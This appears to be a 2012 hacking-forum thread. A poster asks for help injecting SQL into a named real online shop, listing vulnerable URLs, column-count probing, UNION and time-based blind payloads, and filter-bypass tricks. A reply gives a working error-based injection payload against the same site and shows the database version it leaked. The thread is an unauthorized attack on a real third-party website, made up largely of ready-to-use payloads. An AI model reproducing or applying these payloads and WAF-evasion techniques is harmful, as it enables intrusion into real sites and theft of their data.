I'm on this since one week ago and is driving me nuts because I'm sure that it's injectable but I can't find how. :(

Error URLs:

http://adidasioriginalinike.ro/search.php?keywords=zz&category=&minPrice=1'
http://adidasioriginalinike.ro/search.php?minPrice=1'
http://adidasioriginalinike.ro/search.php?category=31'

http://adidasioriginalinike.ro/category.php?id=69'

I got number of columns in table with:

http://adidasioriginalinike.ro/search.php?category=31)+order+by+1--

But when I tried http://adidasioriginalinike.ro/search.php?category=31)+/*!union*/+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19-- I got another error. :(

This seems to select some large amount of data as it is exceeding memory quota: http://adidasioriginalinike.ro/search.php?category=31)+OR+1+LIKE+1--

WAF seems to add '\' when it sees ' so maybe it has addslashes and magicquotes on. Also it filters '=' which can be replaced with LIKE, UNION can be replaced with /*!UNION*/ but it seems it filters many more.

I also tried blind with: http://adidasioriginalinike.ro/search.php?category=31)+AND+1+LIKE+IF((ORD(MID((IFNULL(CAST(DATABASE()+AS+CHAR),0x20)),1,1))+%3E+64),SLEEP(5),1)+AND+(2+LIKE+2 but it gets filtered and when I try to bypass filters I get errors.

Help would be much appreciated. :)

Use error based man :D
http://adidasioriginalinike.ro/search.php
?category=31) +and+(select 1 from (/*!select*/ count(1),concat/**/(floor(rand(0)*2),0x7e,version())x from produse group by x)a)--+-

MySQL Error: 1062 (Duplicate entry '1~5.1.61-cll' for key 'group_key')


Pretty basic eh?

Skype:ripperhf1
twitter:@RIPPER38

You cannot fathom the immensity of the f*** I do not give,



Edited 1 time(s). Last edit at 08/14/2012 10:51AM by ripper.